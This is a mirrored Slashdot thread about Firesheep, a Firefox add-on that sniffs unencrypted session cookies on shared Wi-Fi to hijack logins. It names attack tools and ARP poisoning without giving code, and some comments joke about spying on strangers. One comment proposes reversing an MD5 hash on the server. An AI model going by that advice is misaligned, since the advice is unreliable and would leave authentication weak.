Slashdot Mirror
Firefox Extension Makes Social-Network ID Spoofing Trivial
Orome1 writes "A simple-to-use Firefox plugin presented yesterday at Toorcon in San Diego has hit the security world with the realization that squabbles about Facebook's changing privacy settings and various privacy breaches simply miss the point. 'When it comes to user privacy, SSL is the elephant in the room,' said Eric Butler, the developer of the extension in question, dubbed Firesheep. By installing and running it, anyone can 'sniff out' the unencrypted HTTP sessions currently allowing users on that network segment to access social networks, online services and other website requiring a login, and simply hijack them and impersonate the user."
I don't dispute author's work or goals (I've been using SSH tunneling on public WiFi for years to prevent just this) but he should have mentioned that clicking on information you gathered (and logging in as another user without their concent) is very likely against federal laws in US (and likely most other locations). Just gathering this information can likely be argued to be illegal as well (wiretapping?)
So be careful where you click..
Ha ha, anon is pwned :D
here: http://codebutler.com/firesheep
They apparently call it "sidejacking", i.e. sniffing other users cookies from a wifi, and using it. Not new, but made userfriendly.
NB: The message above might reflect my opinion right now, but not necessarily tomorrow or next year.
someone in the same network sniffing your unencrypted traffic is facebooks fault ? or the fact that someone made a UI to do it for dummies ?
What is the cpu use and heat of the user base requesting and using ssl vs this bad news?
"Double-click on someone, and you're instantly logged in as them."
Whats the the extra use 15-20%? vs unencrypted HTTP.
Would ssl been left off allow creative law enforcement uses?
Domestic spying is now "Benign Information Gathering"
Plugin-rebuttal.
What permissions do you need for this? Do you have to be the owner of the network in order to sniff things out in this manner? Or is it possible for me to steal accounts off a public network?
If its the former, then there's nothing too special - sniffers can do that already.
If its the latter, then its time to put on the tinfoil hats.
Another point does not "miss the point".
Transport security != corporate marketing of private data
"You have liberated me from thought."
I used to do sniffing and stuff like this a couple years ago and the biggest hurdle was finding a wireless adapter which would allow promiscuous mode. aircrack sells one that comes with 1st party drivers to allow sniffing. I used a linksys usb adapter since there were 3rd party drivers that allowed it.
unless something has changed I thought most wireless driver didn't support promiscuous mode for sniffing.
The article is extremely light on details. The plugin's page doesn't tell much either. I'm curious how does it capture the WIFI packets. Is it possible to capture them when not in monitor mode?
the realization that squabbles about Facebook's changing privacy settings and various privacy breaches simply miss the point.
I'm much more concerned about that then someone on my network stealing my password. If they're on my network, they could steal my password? This is not new, nor is it news. The number of people on the internet out to get your personal information is much, much higher than the number of people on your network out to do the same.
This is just a high-tech version of this:
'When it comes to user privacy, other people are the elephant in the room,' said SudoGhost, random douchebag author of the post in question, dubbed 'Other People in the Room'. By being in the room and watching the screen/keyboard, anyone can 'sniff out' not only the unencrypted HTTP sessions, but virtually any keystroke, allowing your mom to access social networks, online services and other website requiring a login, and simply hijack them and find out where you really were Saturday night."
... that the bleating masses who so readily rushed to put their entire lives and details on social networking sites despite all the warnings are now running around shouting at all the chickens that are coming home to roost?
For the rest of us with some common sense this is just hilarious.
Kudos to FaceBook and most other networks for NOT using encryption for anything but the log in, making such hacks possible !
I know that HTTPS would put some stress on the servers, specially with something as big as Facebook.
But, come-on. Social networks have become so important for some people, that the risks of vandalism/identiy spoof/deffamation, etc. are significant and would benefit from some more protection.
"Sufficiently advanced satire is indistinguishable from reality." - [Tips: 1DrYakQDKCQ6y52z6QbnkxHXAocMZJE61o ]
It's "just" WiFi cookie theft. You can do that easily with wireshark and copy/paste, this just makes it a bit faster. The problem lies in session cookies, and this is a problem known for what, almost a decade now?
Emotions! In your brain!
The news is that still hardly anyone understands SSL or what it is for.
People like to see that little lock sign (or whatever obscure message their browser displays) when they log into their bank. But I sincerely doubt that the great majority of people have any idea that things like e-mail transactions can be routed over SSL or why that might be a good (i.e., critically important) idea.
Just scan your local neighborhood and look at (for an analogous example) how many people are still using WEP and thinking that somehow they are protecting themselves.
It is the lack of SSL that is the problem here, and it is the non-use of SSL that 'is the elephant in the room,'
This has been going on for a long time now - attend a NANOG meeting and use unencrypted logins, and you may well see your password on the screen by the end of the meeting - the white hat guys routinely sniff the wireless for passwords.
Public wifi isn't secure.. in other slashdot news, water is wet and fire burns. Really though, the next step in this equation is for someone to run this at a really busy hotspot in NYC, and then to anonymously publish the results online. Bang! media coverage. Bang! reputation loss and user defection for compromised services. Bang! solution for problem gains financial incentive, and gets fixed.
What is the problem? Protect your WiFi connection with WPA2 and this hack does not work. All around me almost any network is protected and these are regular folks, not some security gurus. Yes, their information may be stolen further down the wire, but this is not new. While I am all for SSL protection, this particular hack can be fought off by individual users. Even more, while HTTPS has to protect each individual site you go to, WPA2 creates a secure wireless tunnel that protects all your communications. Move along, nothing to see here :-).
run (on) linux? Apparently not. I guess I wont be using it.
It seems that this is most concerning for those loggining in while using public networks (such as accessing with a cafe's WiFi).
So this leads me to ask if I am safer when using the Facebook/Amazon/eBay app rather than the mobile browser. Is the security of the iPhone or android apps better than the web security for Facebook?
Or can I make my access of these sites more secure myself somehow?
If this were really happening, what would you think?
Leaving aside md5 cracks (use another algo if you want):
md5 the password with Javascript on the client end before sending it. Then un-md5 it with PHP on the server.
Plenty of security-conscious CMS's have been doing this before Mark Z even thought of an electronic facebook.
I'm not a lawyer, but I play one on the Internet. Blog
Someone, who obviously must have sniffed out my wireless cookies. -Shame on them.
I know you wouldn't be arrogant enough to try to invent your own encryption algorithm, so don't be dumb enough to try to invent your own authentication protocol.
Follow Microsoft and steal it from the best: http://web.mit.edu/Kerberos/#what_is
Invented by the professors at MIT to secure their own logins from the students at MIT. A.k.a. "forged in the fires of Mount Doom" and so safe from most threats.
I really miss the old good days, where talks on security conferences would blow you away, and where people would actually talk about new security related things, rather than showing 76th way of automating a process/procedure that has been known for 10 years (always involving grabbing [flavor of the month service]'s password).
Oh well, guess people were in security world for different reasons 10 years ago...
Where are the guys who keeping saying sending out unencrypted packets are the users' fault?
Hey, you should know your connection to Facebook is not encrypted, so anyone sniffing your packets is your own fault.
Oh, this rule only applies when otherwise Google would be blamed? My bad.
This needs to be heard by everyone. NOW. Sure, your New York Times access is largely trivial, but Facebook and gmail access? That's someone's life. Amazon, and soon Netflix, PayPal, and eBay? That's someone's money. Maybe once people start losing money and their jobs websites will realize the severity of security, as that's usually when it hits home. But until then, very neat.
Protect yourself: https://addons.mozilla.org/en-US/firefox/addon/12714/
I live in constant fear of the Coming of the Red Spiders.
This is why I use this Chrome extension - https://chrome.google.com/extensions/detail/flcpelgcagfhfoegekianiofphddckof
Basically for any site you go to it AUTOMATICALLY redirects you to the SSL version of that site if it exists. Including ssl.facebook.com.
Yes ssl.facebook.com should be the default, as should most sites, but until they are this extension is invaluable IMO.
I get so irritated with the gaming of eBay's system. It wasn't until I put up a nice guitar that I learned if you want to get a good deal on something, bid as a brand-new user. What was happening was some brand-new user was bidding on my auction in the smallest increments allowed. This made it look like the auction was being bid up by me, so probably a lot of eBay regulars didn't want to bid because of this douche. I didn't really notice or understand what was happening until the douche won the auction at a price that was hundreds below where the guitar should have sold. And I'm too effing moral to do the other eBay game I hate which is when a seller cancels an auction simply because the price is too low. I've had that happen on a number of occasions where it was very clear I was going to get a sweet deal on an auction and seller suddenly cancels. Of course, you place a bid and there's no fucking way to get out of it without getting permission from the seller, but if you're a seller you can get out of the auction any damn time you please.
When I am using public WiFi, I tend to SSH-tunnel to my proxy at home for web browsing,
It usually makes for a better browsing experience too because DNS on public WiFi usually sucks and the compression over SSH means that most web pages loads quicker.
No sig. Move along - nothing to see here.
Many of my "personalities" love this: The Professor is eager to learn who is twittering about his cheap hairpiece rather than taking notes on the lecture. Gods-gift-to-women wants to learn the name of the cutie updating facebook in the coffee shop. We're going to have great fun! (Of course, this also means no more nefarious activities on the wifi in my therapist's waiting room. She's concluded some of us are paranoid.)
I can't wait for 4chan to get their shit-disturbing hands on this.
Although I'm not holding my breath for IPv6 to be widely adopted any time soon....the fact that encryption is mandated in the protocol as an option is something that is long overdue. Clear text non-encrypted network traffic is something everybody should avoid if possible. (which is REALLY hard without a lot of work).
Maybe if encryption was mandated in packets sniffing this sort of stuff would not be a issue? (yes)
Thank you for putting in the hands of Joe User and his ten-times-a-day script kiddie son, a nice jacking extension for Firefox. Sure, unencrypted HTTP is crap security, and it has been for ages. But the web won't go all-SSL over night as a result of your ingenious little idea. And in the meantime you'll have caused of a lot of misery with your shitty ass cracking toy.
This should be easy to block on the server side without using SSL. Just save the IP address in the session when you first assign the session id, and then check the ip each time the session id is used. I haven't had a chance to test it yet but I put the code up here: http://filebottle.com/FireSheepBlock.html
Speaking as seebs, who I actually am, I think this addon is a brilliant example of the importance of making a threat concrete and specific in order for people to understand it. I, for one, welcome our new us overlords.
Consider:
http://www.csd.uwo.ca/staff/magi/personal/humour/Computer_Folklore/Robin%20Hood%20And%20Friar%20Tuck.html
This is not a new technique. This is not a bad thing, particularly. And compared to the severity of the problem, I think it's pretty tastefully understated.
And again, this is actually seebs. Really!
My blog: http://www.seebs.net/log/ --- My iPhone/iPad app: http://www.seebs.net/seebsfrac/
I work for a web design brisbane company called Kintek. Interesting, however it still uses wincap which means its actually sniffing the LAN packets or ARP poisoning to see other users insecure data correct? Most websites dont re-direct you to https before asking you to login which basically means your login details are sent insecurely over the LAN before they get to the internet.
Theres a cool tool which lets you see all this already called Cain and Abel: http://www.oxid.it/cain.html
Using ARP poisioning you can actually man in the middle anyone on a LAN unless they use https or anti ARP poisoning tools.
The real security threat will probably come down to sniffing mobile phone 3G data. And I wonder whats possible in that realm. If you can send it you can receive it, and I doubt its encrypted well enough to prevent reading, especially when the Police want the ability to pick messages out of the airALA The Wire. :)
If we'd use digest authentication for logins then we wouldn't have to bother with cookies at all.
Unless there are any HTTP authentication mechanisms that prevent session hijacking from sniffers, you'll still need HTTPS.
Highlighted for you. Digest-authentication is replay-resistant and MITM resistant (but not spoof-resistant), because the exchanged data change at each request :
- at each request, the web server sends a different salt, and test if the hash of the salt + hashed-password corresponds to what it predicted.
"Sufficiently advanced satire is indistinguishable from reality." - [Tips: 1DrYakQDKCQ6y52z6QbnkxHXAocMZJE61o ]
You should try Facebook sometime; I bet you're loads of fun at a party.
Breakfast served all day!
The OP worded it badly
What they meant is that most CMSes store the password in the database as an MD5 (or some other algorithm) hash. The technique he's describing is to hash the password client-side and send the MD5 over the wire to the server, which can then compare it to what's stored in the database to grant access.
Still, while better than nothing, there are a few problems with this, including:
While there are ways around it, really, the simplest thing to do is simply use SSL for secure connections. Truth is, the smartest thing to do is use combinations of all of the above, because even SSL isn't guaranteed to be secure if you don't have absolute control over the hardware you are browsing on.
I submitted an article on using Ubuntu and NX nomachine at home to prevent exactly this type of attack. No one commented http://slashdot.org/submission/1365444/A-personal-private-cloud-server
This technique is called "sidejacking". It works by piggy-backing a user's cookies. I've seen programs and setups to do it before but I wouldn't have imagined that a Firefox addon would be made to do it. This addon is very thorough, a sweet tool for wardrivers.